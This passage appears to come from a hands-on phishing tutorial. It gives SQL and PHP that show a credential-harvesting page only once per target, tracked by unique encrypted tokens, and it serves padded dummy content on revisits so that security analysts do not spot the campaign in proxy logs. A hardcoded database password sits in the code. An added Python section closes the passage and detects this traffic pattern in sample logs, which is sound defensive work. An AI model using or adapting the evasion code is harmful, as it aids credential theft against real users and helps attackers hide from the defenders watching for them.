Diverting the Analysts

If we have used the steps in the previous sections to create a unique link for each user, we can divert the analysts' attention.

To prevent any suspicious analysts from seeing our site and blowing our cover, we will add a small diversion: bootstrap code that follows some basic logic to decide whether or not to display the phishing page.

Each user who gets the phishing email, by design, gets a unique URL to our secret page thanks to the encrypted name incorporated in the utm_term parameter, so the URL will only be viewed once by each user.

To carry off this ruse, we first create a SQL table with four columns: a row ID; the utm_term token's value, which is the encrypted target name; a counter to track visits; and finally the date of the first visit.

Here is the SQL code to create the table schema and load the encrypted tokens:

root@Phishing:~# mysql -u root -p

mysql> CREATE TABLE tokens (
    id INT(6) UNSIGNED AUTO_INCREMENT PRIMARY KEY,
    utmterm VARCHAR(100) NOT NULL,
    counter SMALLINT,
    updated_at DATETIME
);

mysql> INSERT INTO tokens VALUES (null, "FAgUHRNXNjo6FjtM", 0, null);
mysql> INSERT INTO tokens VALUES (null, "AwgQFR9XITw7AyBdIQ==", 0, null);
--snip--

Next, we need some bootstrap PHP code.

If the page has already been visited by this user (counter > 0), it loads dummy content that has exactly the same length as the password-grabbing form. If the user hasn't yet visited the page, it serves the actual phishing page.

Avoid using redirections. An analyst looking at proxy data could potentially spot the discrepancy between users successfully loading the page the first time (HTTP code 200) and those same users failing to revisit it again (HTTP code 302).

PHP code to determine whether a user should be served the phishing page or redirected to the home page:

<?php
// If no utm_term token or if it's empty, redirect to main page
if (!isset($_GET['utm_term']) or empty($_GET['utm_term'])) {
	header('Location: /');
	exit;
}

// Establish a MySQL connection (DSN and placeholder names must contain no spaces)
$db = new PDO('mysql:host=localhost;dbname=catalog_db3;charset=utf8mb4', 'wp_user', 'Kja9880:Lkaz098');

// Fetch the row (including the counter field) tied to the specified utm_term parameter
$stmt = $db->prepare("SELECT * FROM tokens WHERE utmterm=:utmterm");
$stmt->execute(array(":utmterm" => $_GET['utm_term']));
$row = $stmt->fetch(PDO::FETCH_ASSOC);

// If the page is viewed for the first time, display the earlier form
if ($row and $row['counter'] == 0) {

	// PASTE FORM GRABBING CODE FROM SITE BUILDING SECTION

	// Increment the counter now that the page has been displayed
	// (updated_at is the column name defined in the table schema above)
	$stmt2 = $db->prepare("UPDATE tokens SET counter = 1, updated_at = NOW() WHERE utmterm=:utmterm");
	$res = $stmt2->execute(array(":utmterm" => $_GET['utm_term']));

// If no matching token is found, then it was tampered with so
// we redirect to the home page
} else if (!$row) {
	header('Location: /');
	exit;

// If the user visits a second time, show the usual error with padding
} else {
	echo "The plug-in will be available in a couple of days in your region, please come back soon!";
}
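Seen from the analyst's side, the traffic pattern this setup produces (one utm_term value per user, each seen by exactly one user, and a different HTTP status on any revisit) is itself a signal in proxy logs. The following Python script is an added example, not code from the original page: it scans constructed proxy log lines for pages whose utm_term values each map to a single user, and counts users whose repeat visit with the same token got a different status than the first. The log format, hostnames, user names and tokens are assumptions made for the sample.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed proxy log sample (not real traffic): time user host url status bytes
SAMPLE_LOG = """\
10:01:02 alice catalog.example.test /plugin?utm_source=mail&utm_term=FAgUHRNXNjo6FjtM 200 4812
10:01:40 bob catalog.example.test /plugin?utm_source=mail&utm_term=AwgQFR9XITw7AyBdIQ== 200 4812
10:02:15 carol catalog.example.test /plugin?utm_source=mail&utm_term=Q29uc3RydWN0ZWQ= 200 4812
10:09:30 alice catalog.example.test /plugin?utm_source=mail&utm_term=FAgUHRNXNjo6FjtM 302 0
10:11:05 alice news.example.test /story?utm_term=spring_sale 200 20345
10:11:09 bob news.example.test /story?utm_term=spring_sale 200 20345
10:12:00 carol news.example.test /story?utm_term=spring_sale 200 20345
"""
LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3}) (\d+)$")

def parse_line(line):
    # One proxy record as a dict, or None for lines that do not match the assumed format
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, user, host, url, status, size = m.groups()
    parts = urlsplit(url)
    token = parse_qs(parts.query).get("utm_term", [None])[0]
    return {"user": user, "host": host, "path": parts.path,
            "token": token, "status": int(status)}

def find_one_time_token_pages(log_text, min_tokens=3):
    # Flag (host, path) pairs with at least min_tokens utm_term values that each
    # belong to exactly one user; count status changes on a user's repeat visit
    by_page = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["token"]:
            by_page[(rec["host"], rec["path"])].append(rec)
    findings = []
    for (host, path), recs in by_page.items():
        users_per_token = defaultdict(set)
        for r in recs:
            users_per_token[r["token"]].add(r["user"])
        # Shared campaign tags (one token, many users) are ordinary marketing traffic
        if len(users_per_token) < min_tokens or any(len(u) != 1 for u in users_per_token.values()):
            continue
        first_status, status_flips = {}, 0
        for r in recs:
            key = (r["user"], r["token"])
            if key not in first_status:
                first_status[key] = r["status"]
            elif r["status"] != first_status[key]:
                status_flips += 1
        findings.append({"host": host, "path": path,
                         "tokens": len(users_per_token), "status_flips": status_flips})
    return findings
```

On the sample, only the /plugin page is flagged: three tokens, each tied to one user, and one user whose second visit returned 302 instead of 200.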
